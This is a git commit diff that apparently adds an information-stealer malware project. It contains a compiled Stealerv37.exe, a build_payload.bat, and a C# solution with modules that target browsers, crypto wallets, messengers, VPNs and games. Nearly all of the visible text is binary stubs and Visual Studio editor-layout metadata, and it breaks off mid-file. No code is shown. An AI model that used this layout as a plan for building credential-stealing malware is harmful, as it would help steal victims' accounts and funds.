commit 89e4383061fc78820a6713ac1e8d52db938be6a3 Author: i2p Date: Thu Aug 27 18:29:08 2026 +0000 initial commit diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 0000000..6caff61 Binary files /dev/null and b/.DS_Store differ diff --git a/._. b/._. new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/._. differ diff --git a/._.DS_Store b/._.DS_Store new file mode 100644 index 0000000..a5b28df Binary files /dev/null and b/._.DS_Store differ diff --git a/._Builds b/._Builds new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/._Builds differ diff --git a/._New b/._New new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/._New differ diff --git a/._build_payload.bat b/._build_payload.bat new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/._build_payload.bat differ diff --git a/._builder_config.json b/._builder_config.json new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/._builder_config.json differ diff --git a/Builds/._Stealerv37.exe b/Builds/._Stealerv37.exe new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/Builds/._Stealerv37.exe differ diff --git a/Builds/._Stealerv37.exe.config b/Builds/._Stealerv37.exe.config new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/Builds/._Stealerv37.exe.config differ diff --git a/Builds/Stealerv37.exe b/Builds/Stealerv37.exe new file mode 100755 index 0000000..286ad59 Binary files /dev/null and b/Builds/Stealerv37.exe differ diff --git a/Builds/Stealerv37.exe.config b/Builds/Stealerv37.exe.config new file mode 100644 index 0000000..ab21881 --- /dev/null +++ b/Builds/Stealerv37.exe.config @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/New/.DS_Store b/New/.DS_Store new file mode 100644 index 0000000..42b1e3c Binary files /dev/null and b/New/.DS_Store differ diff --git a/New/._.DS_Store b/New/._.DS_Store new file mode 100644 index 0000000..a5b28df Binary files /dev/null and b/New/._.DS_Store differ diff --git a/New/._.vs b/New/._.vs new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/._.vs differ diff --git a/New/._CvMega b/New/._CvMega new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/._CvMega differ diff --git a/New/._CvMega.Helper b/New/._CvMega.Helper new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/._CvMega.Helper differ diff --git a/New/._FodyWeavers.xml b/New/._FodyWeavers.xml new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/._FodyWeavers.xml differ diff --git a/New/._FodyWeavers.xsd b/New/._FodyWeavers.xsd new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/._FodyWeavers.xsd differ diff --git a/New/._Intelix.Helper b/New/._Intelix.Helper new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/._Intelix.Helper differ diff --git a/New/._Intelix.Helper.Data b/New/._Intelix.Helper.Data new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/._Intelix.Helper.Data differ diff --git a/New/._Intelix.Helper.Encrypted b/New/._Intelix.Helper.Encrypted new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/._Intelix.Helper.Encrypted differ diff --git a/New/._Intelix.Helper.Hashing b/New/._Intelix.Helper.Hashing new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/._Intelix.Helper.Hashing differ diff --git a/New/._Intelix.Helper.Sql b/New/._Intelix.Helper.Sql new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/._Intelix.Helper.Sql differ diff --git a/New/._Intelix.Targets b/New/._Intelix.Targets new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/._Intelix.Targets differ diff --git a/New/._Intelix.Targets.Applications b/New/._Intelix.Targets.Applications new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/._Intelix.Targets.Applications differ diff --git a/New/._Intelix.Targets.Browsers b/New/._Intelix.Targets.Browsers new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/._Intelix.Targets.Browsers differ diff --git a/New/._Intelix.Targets.Crypto b/New/._Intelix.Targets.Crypto new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/._Intelix.Targets.Crypto differ diff --git a/New/._Intelix.Targets.Device b/New/._Intelix.Targets.Device new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/._Intelix.Targets.Device differ diff --git a/New/._Intelix.Targets.Games b/New/._Intelix.Targets.Games new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/._Intelix.Targets.Games differ diff --git a/New/._Intelix.Targets.Messangers b/New/._Intelix.Targets.Messangers new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/._Intelix.Targets.Messangers differ diff --git a/New/._Intelix.Targets.Vpn b/New/._Intelix.Targets.Vpn new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/._Intelix.Targets.Vpn differ diff --git a/New/._Properties b/New/._Properties new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/._Properties differ diff --git a/New/._aoStealerv35_c6.csproj b/New/._aoStealerv35_c6.csproj new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/._aoStealerv35_c6.csproj differ diff --git a/New/._aoStealerv35_c6.sln b/New/._aoStealerv35_c6.sln new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/._aoStealerv35_c6.sln differ diff --git a/New/._app.manifest b/New/._app.manifest new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/._app.manifest differ diff --git a/New/._bin b/New/._bin new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/._bin differ diff --git a/New/._obj b/New/._obj new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/._obj differ diff --git a/New/.vs/._ProjectEvaluation b/New/.vs/._ProjectEvaluation new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/.vs/._ProjectEvaluation differ diff --git a/New/.vs/._aoStealerv35_c6 b/New/.vs/._aoStealerv35_c6 new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/.vs/._aoStealerv35_c6 differ diff --git a/New/.vs/ProjectEvaluation/._aostealerv35_c6.metadata.v9.bin b/New/.vs/ProjectEvaluation/._aostealerv35_c6.metadata.v9.bin new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/.vs/ProjectEvaluation/._aostealerv35_c6.metadata.v9.bin differ diff --git a/New/.vs/ProjectEvaluation/._aostealerv35_c6.projects.v9.bin b/New/.vs/ProjectEvaluation/._aostealerv35_c6.projects.v9.bin new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/.vs/ProjectEvaluation/._aostealerv35_c6.projects.v9.bin differ diff --git a/New/.vs/ProjectEvaluation/._aostealerv35_c6.strings.v9.bin b/New/.vs/ProjectEvaluation/._aostealerv35_c6.strings.v9.bin new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/.vs/ProjectEvaluation/._aostealerv35_c6.strings.v9.bin differ diff --git a/New/.vs/ProjectEvaluation/aostealerv35_c6.metadata.v9.bin b/New/.vs/ProjectEvaluation/aostealerv35_c6.metadata.v9.bin new file mode 100644 index 0000000..1bb02e6 Binary files /dev/null and b/New/.vs/ProjectEvaluation/aostealerv35_c6.metadata.v9.bin differ diff --git a/New/.vs/ProjectEvaluation/aostealerv35_c6.projects.v9.bin b/New/.vs/ProjectEvaluation/aostealerv35_c6.projects.v9.bin new file mode 100644 index 0000000..e986ba9 Binary files /dev/null and b/New/.vs/ProjectEvaluation/aostealerv35_c6.projects.v9.bin differ diff --git a/New/.vs/ProjectEvaluation/aostealerv35_c6.strings.v9.bin b/New/.vs/ProjectEvaluation/aostealerv35_c6.strings.v9.bin new file mode 100644 index 0000000..4a07a3b Binary files /dev/null and b/New/.vs/ProjectEvaluation/aostealerv35_c6.strings.v9.bin differ diff --git a/New/.vs/aoStealerv35_c6/._CopilotIndices b/New/.vs/aoStealerv35_c6/._CopilotIndices new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/.vs/aoStealerv35_c6/._CopilotIndices differ diff --git a/New/.vs/aoStealerv35_c6/._DesignTimeBuild b/New/.vs/aoStealerv35_c6/._DesignTimeBuild new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/.vs/aoStealerv35_c6/._DesignTimeBuild differ diff --git a/New/.vs/aoStealerv35_c6/._FileContentIndex b/New/.vs/aoStealerv35_c6/._FileContentIndex new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/.vs/aoStealerv35_c6/._FileContentIndex differ diff --git a/New/.vs/aoStealerv35_c6/._v17 b/New/.vs/aoStealerv35_c6/._v17 new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/.vs/aoStealerv35_c6/._v17 differ diff --git a/New/.vs/aoStealerv35_c6/CopilotIndices/._17.14.1147.5054 b/New/.vs/aoStealerv35_c6/CopilotIndices/._17.14.1147.5054 new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/.vs/aoStealerv35_c6/CopilotIndices/._17.14.1147.5054 differ diff --git a/New/.vs/aoStealerv35_c6/CopilotIndices/17.14.1147.5054/._CodeChunks.db b/New/.vs/aoStealerv35_c6/CopilotIndices/17.14.1147.5054/._CodeChunks.db new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/.vs/aoStealerv35_c6/CopilotIndices/17.14.1147.5054/._CodeChunks.db differ diff --git a/New/.vs/aoStealerv35_c6/CopilotIndices/17.14.1147.5054/._SemanticSymbols.db b/New/.vs/aoStealerv35_c6/CopilotIndices/17.14.1147.5054/._SemanticSymbols.db new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/.vs/aoStealerv35_c6/CopilotIndices/17.14.1147.5054/._SemanticSymbols.db differ diff --git a/New/.vs/aoStealerv35_c6/CopilotIndices/17.14.1147.5054/CodeChunks.db b/New/.vs/aoStealerv35_c6/CopilotIndices/17.14.1147.5054/CodeChunks.db new file mode 100644 index 0000000..fd3db16 Binary files /dev/null and b/New/.vs/aoStealerv35_c6/CopilotIndices/17.14.1147.5054/CodeChunks.db differ diff --git a/New/.vs/aoStealerv35_c6/CopilotIndices/17.14.1147.5054/SemanticSymbols.db b/New/.vs/aoStealerv35_c6/CopilotIndices/17.14.1147.5054/SemanticSymbols.db new file mode 100644 index 0000000..1eca9a6 Binary files /dev/null and b/New/.vs/aoStealerv35_c6/CopilotIndices/17.14.1147.5054/SemanticSymbols.db differ diff --git a/New/.vs/aoStealerv35_c6/DesignTimeBuild/._.dtbcache.v2 b/New/.vs/aoStealerv35_c6/DesignTimeBuild/._.dtbcache.v2 new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/.vs/aoStealerv35_c6/DesignTimeBuild/._.dtbcache.v2 differ diff --git a/New/.vs/aoStealerv35_c6/DesignTimeBuild/.dtbcache.v2 b/New/.vs/aoStealerv35_c6/DesignTimeBuild/.dtbcache.v2 new file mode 100644 index 0000000..1766a54 Binary files /dev/null and b/New/.vs/aoStealerv35_c6/DesignTimeBuild/.dtbcache.v2 differ diff --git a/New/.vs/aoStealerv35_c6/FileContentIndex/._1d403756-597d-4c00-b820-c2f29caffdb6.vsidx b/New/.vs/aoStealerv35_c6/FileContentIndex/._1d403756-597d-4c00-b820-c2f29caffdb6.vsidx new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/.vs/aoStealerv35_c6/FileContentIndex/._1d403756-597d-4c00-b820-c2f29caffdb6.vsidx differ diff --git a/New/.vs/aoStealerv35_c6/FileContentIndex/._283ff35f-e634-444d-9d55-867bfb4e2334.vsidx b/New/.vs/aoStealerv35_c6/FileContentIndex/._283ff35f-e634-444d-9d55-867bfb4e2334.vsidx new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/.vs/aoStealerv35_c6/FileContentIndex/._283ff35f-e634-444d-9d55-867bfb4e2334.vsidx differ diff --git a/New/.vs/aoStealerv35_c6/FileContentIndex/._a7dafad6-68e6-4d00-abd8-00ab89ed4a8c.vsidx b/New/.vs/aoStealerv35_c6/FileContentIndex/._a7dafad6-68e6-4d00-abd8-00ab89ed4a8c.vsidx new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/.vs/aoStealerv35_c6/FileContentIndex/._a7dafad6-68e6-4d00-abd8-00ab89ed4a8c.vsidx differ diff --git a/New/.vs/aoStealerv35_c6/FileContentIndex/._aee14d6c-5571-4867-9ca5-cb2a50a860d6.vsidx b/New/.vs/aoStealerv35_c6/FileContentIndex/._aee14d6c-5571-4867-9ca5-cb2a50a860d6.vsidx new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/.vs/aoStealerv35_c6/FileContentIndex/._aee14d6c-5571-4867-9ca5-cb2a50a860d6.vsidx differ diff --git a/New/.vs/aoStealerv35_c6/FileContentIndex/._b66b24b5-aa0e-416d-97e4-3d7d13a01710.vsidx b/New/.vs/aoStealerv35_c6/FileContentIndex/._b66b24b5-aa0e-416d-97e4-3d7d13a01710.vsidx new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/.vs/aoStealerv35_c6/FileContentIndex/._b66b24b5-aa0e-416d-97e4-3d7d13a01710.vsidx differ diff --git a/New/.vs/aoStealerv35_c6/FileContentIndex/1d403756-597d-4c00-b820-c2f29caffdb6.vsidx b/New/.vs/aoStealerv35_c6/FileContentIndex/1d403756-597d-4c00-b820-c2f29caffdb6.vsidx new file mode 100644 index 0000000..70aef67 Binary files /dev/null and b/New/.vs/aoStealerv35_c6/FileContentIndex/1d403756-597d-4c00-b820-c2f29caffdb6.vsidx differ diff --git a/New/.vs/aoStealerv35_c6/FileContentIndex/283ff35f-e634-444d-9d55-867bfb4e2334.vsidx b/New/.vs/aoStealerv35_c6/FileContentIndex/283ff35f-e634-444d-9d55-867bfb4e2334.vsidx new file mode 100644 index 0000000..70aef67 Binary files /dev/null and b/New/.vs/aoStealerv35_c6/FileContentIndex/283ff35f-e634-444d-9d55-867bfb4e2334.vsidx differ diff --git a/New/.vs/aoStealerv35_c6/FileContentIndex/a7dafad6-68e6-4d00-abd8-00ab89ed4a8c.vsidx b/New/.vs/aoStealerv35_c6/FileContentIndex/a7dafad6-68e6-4d00-abd8-00ab89ed4a8c.vsidx new file mode 100644 index 0000000..93584b1 Binary files /dev/null and b/New/.vs/aoStealerv35_c6/FileContentIndex/a7dafad6-68e6-4d00-abd8-00ab89ed4a8c.vsidx differ diff --git a/New/.vs/aoStealerv35_c6/FileContentIndex/aee14d6c-5571-4867-9ca5-cb2a50a860d6.vsidx b/New/.vs/aoStealerv35_c6/FileContentIndex/aee14d6c-5571-4867-9ca5-cb2a50a860d6.vsidx new file mode 100644 index 0000000..585002b Binary files /dev/null and b/New/.vs/aoStealerv35_c6/FileContentIndex/aee14d6c-5571-4867-9ca5-cb2a50a860d6.vsidx differ diff --git a/New/.vs/aoStealerv35_c6/FileContentIndex/b66b24b5-aa0e-416d-97e4-3d7d13a01710.vsidx b/New/.vs/aoStealerv35_c6/FileContentIndex/b66b24b5-aa0e-416d-97e4-3d7d13a01710.vsidx new file mode 100644 index 0000000..70aef67 Binary files /dev/null and b/New/.vs/aoStealerv35_c6/FileContentIndex/b66b24b5-aa0e-416d-97e4-3d7d13a01710.vsidx differ diff --git a/New/.vs/aoStealerv35_c6/v17/._.futdcache.v2 b/New/.vs/aoStealerv35_c6/v17/._.futdcache.v2 new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/.vs/aoStealerv35_c6/v17/._.futdcache.v2 differ diff --git a/New/.vs/aoStealerv35_c6/v17/._.suo b/New/.vs/aoStealerv35_c6/v17/._.suo new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/.vs/aoStealerv35_c6/v17/._.suo differ diff --git a/New/.vs/aoStealerv35_c6/v17/._DocumentLayout.backup.json b/New/.vs/aoStealerv35_c6/v17/._DocumentLayout.backup.json new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/.vs/aoStealerv35_c6/v17/._DocumentLayout.backup.json differ diff --git a/New/.vs/aoStealerv35_c6/v17/._DocumentLayout.json b/New/.vs/aoStealerv35_c6/v17/._DocumentLayout.json new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/.vs/aoStealerv35_c6/v17/._DocumentLayout.json differ diff --git a/New/.vs/aoStealerv35_c6/v17/._HierarchyCache.v1.txt b/New/.vs/aoStealerv35_c6/v17/._HierarchyCache.v1.txt new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/.vs/aoStealerv35_c6/v17/._HierarchyCache.v1.txt differ diff --git a/New/.vs/aoStealerv35_c6/v17/.futdcache.v2 b/New/.vs/aoStealerv35_c6/v17/.futdcache.v2 new file mode 100644 index 0000000..29646f2 Binary files /dev/null and b/New/.vs/aoStealerv35_c6/v17/.futdcache.v2 differ diff --git a/New/.vs/aoStealerv35_c6/v17/.suo b/New/.vs/aoStealerv35_c6/v17/.suo new file mode 100644 index 0000000..757a955 Binary files /dev/null and b/New/.vs/aoStealerv35_c6/v17/.suo differ diff --git a/New/.vs/aoStealerv35_c6/v17/DocumentLayout.backup.json b/New/.vs/aoStealerv35_c6/v17/DocumentLayout.backup.json new file mode 100644 index 0000000..6f70e09 --- /dev/null +++ b/New/.vs/aoStealerv35_c6/v17/DocumentLayout.backup.json @@ -0,0 +1,148 @@ +{ + "Version": 1, + "WorkspaceRootPath": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\", + "Documents": [ + { + "AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\cvmega\\plugin.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}", + "RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:cvmega\\plugin.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}" + }, + { + "AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\intelix.targets.device\\systeminfo.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}", + "RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:intelix.targets.device\\systeminfo.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}" + }, + { + "AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\aostealerv35_c6.csproj||{04B8AB82-A572-4FEF-95CE-5222444B6B64}|", + "RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:aostealerv35_c6.csproj||{04B8AB82-A572-4FEF-95CE-5222444B6B64}|" + }, + { + "AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\intelix.helper.data\\counter.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}", + "RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:intelix.helper.data\\counter.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}" + }, + { + "AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\intelix.helper\\windowsinfo.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}", + "RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:intelix.helper\\windowsinfo.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}" + }, + { + "AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\intelix.targets\\itarget.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}", + "RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:intelix.targets\\itarget.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}" + }, + { + "AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\intelix.targets.device\\screenshot.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}", + "RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:intelix.targets.device\\screenshot.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}" + }, + { + "AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\intelix.targets.crypto\\cryptodesktop.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}", + "RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:intelix.targets.crypto\\cryptodesktop.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}" + } + ], + "DocumentGroupContainers": [ + { + "Orientation": 1, + "VerticalTabListWidth": 256, + "DocumentGroups": [ + { + "DockedHeight": 200, + "SelectedChildIndex": 6, + "Children": [ + { + "$type": "Document", + "DocumentIndex": 4, + "Title": "WindowsInfo.cs", + "DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Helper\\WindowsInfo.cs", + "RelativeDocumentMoniker": "Intelix.Helper\\WindowsInfo.cs", + "ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Helper\\WindowsInfo.cs", + "RelativeToolTip": "Intelix.Helper\\WindowsInfo.cs", + "ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==", + "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|", + "WhenOpened": "2025-11-14T06:24:20.246Z" + }, + { + "$type": "Document", + "DocumentIndex": 5, + "Title": "ITarget.cs", + "DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets\\ITarget.cs", + "RelativeDocumentMoniker": "Intelix.Targets\\ITarget.cs", + "ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets\\ITarget.cs", + "RelativeToolTip": "Intelix.Targets\\ITarget.cs", + "ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==", + "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|", + "WhenOpened": "2025-11-14T06:23:56.835Z" + }, + { + "$type": "Document", + "DocumentIndex": 6, + "Title": "ScreenShot.cs", + "DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets.Device\\ScreenShot.cs", + "RelativeDocumentMoniker": "Intelix.Targets.Device\\ScreenShot.cs", + "ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets.Device\\ScreenShot.cs", + "RelativeToolTip": "Intelix.Targets.Device\\ScreenShot.cs", + "ViewState": "AgIAAAAAAAAAAAAAAAAAAGkAAAATAAAAAAAAAA==", + "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|", + "WhenOpened": "2025-11-14T06:17:48.591Z" + }, + { + "$type": "Document", + "DocumentIndex": 7, + "Title": "CryptoDesktop.cs", + "DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets.Crypto\\CryptoDesktop.cs", + "RelativeDocumentMoniker": "Intelix.Targets.Crypto\\CryptoDesktop.cs", + "ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets.Crypto\\CryptoDesktop.cs", + "RelativeToolTip": "Intelix.Targets.Crypto\\CryptoDesktop.cs", + "ViewState": "AgIAACYAAAAAAAAAAAAQwAAAAAAAAAAAAAAAAA==", + "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|", + "WhenOpened": "2025-11-14T06:17:25.353Z" + }, + { + "$type": "Document", + "DocumentIndex": 1, + "Title": "SystemInfo.cs", + "DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets.Device\\SystemInfo.cs", + "RelativeDocumentMoniker": "Intelix.Targets.Device\\SystemInfo.cs", + "ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets.Device\\SystemInfo.cs", + "RelativeToolTip": "Intelix.Targets.Device\\SystemInfo.cs", + "ViewState": "AgIAAAAAAAAAAAAAAAAAAAkBAAAGAAAAAAAAAA==", + "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|", + "WhenOpened": "2025-11-14T06:13:39.667Z" + }, + { + "$type": "Document", + "DocumentIndex": 2, + "Title": "aoStealerv35_c6", + "DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\aoStealerv35_c6.csproj", + "RelativeDocumentMoniker": "aoStealerv35_c6.csproj", + "ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\aoStealerv35_c6.csproj", + "RelativeToolTip": "aoStealerv35_c6.csproj", + "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000758|", + "WhenOpened": "2025-11-14T05:57:49.856Z" + }, + { + "$type": "Document", + "DocumentIndex": 0, + "Title": "Plugin.cs", + "DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\CvMega\\Plugin.cs", + "RelativeDocumentMoniker": "CvMega\\Plugin.cs", + "ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\CvMega\\Plugin.cs", + "RelativeToolTip": "CvMega\\Plugin.cs", + "ViewState": "AgIAAGAAAAAAAAAAAAAuwHMAAAAlAAAAAAAAAA==", + "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|", + "WhenOpened": "2025-11-14T05:42:53.155Z", + "EditorCaption": "" + }, + { + "$type": "Document", + "DocumentIndex": 3, + "Title": "Counter.cs", + "DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Helper.Data\\Counter.cs", + "RelativeDocumentMoniker": "Intelix.Helper.Data\\Counter.cs", + "ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Helper.Data\\Counter.cs", + "RelativeToolTip": "Intelix.Helper.Data\\Counter.cs", + "ViewState": "AgIAAB8AAAAAAAAAAAAiwEAAAAAoAAAAAAAAAA==", + "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|", + "WhenOpened": "2025-11-14T06:25:21.693Z" + } + ] + } + ] + } + ] +} \ No newline at end of file diff --git a/New/.vs/aoStealerv35_c6/v17/DocumentLayout.json b/New/.vs/aoStealerv35_c6/v17/DocumentLayout.json new file mode 100644 index 0000000..dbb8e13 --- /dev/null +++ b/New/.vs/aoStealerv35_c6/v17/DocumentLayout.json @@ -0,0 +1,148 @@ +{ + "Version": 1, + "WorkspaceRootPath": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\", + "Documents": [ + { + "AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\cvmega\\plugin.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}", + "RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:cvmega\\plugin.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}" + }, + { + "AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\intelix.targets.device\\systeminfo.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}", + "RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:intelix.targets.device\\systeminfo.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}" + }, + { + "AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\aostealerv35_c6.csproj||{04B8AB82-A572-4FEF-95CE-5222444B6B64}|", + "RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:aostealerv35_c6.csproj||{04B8AB82-A572-4FEF-95CE-5222444B6B64}|" + }, + { + "AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan 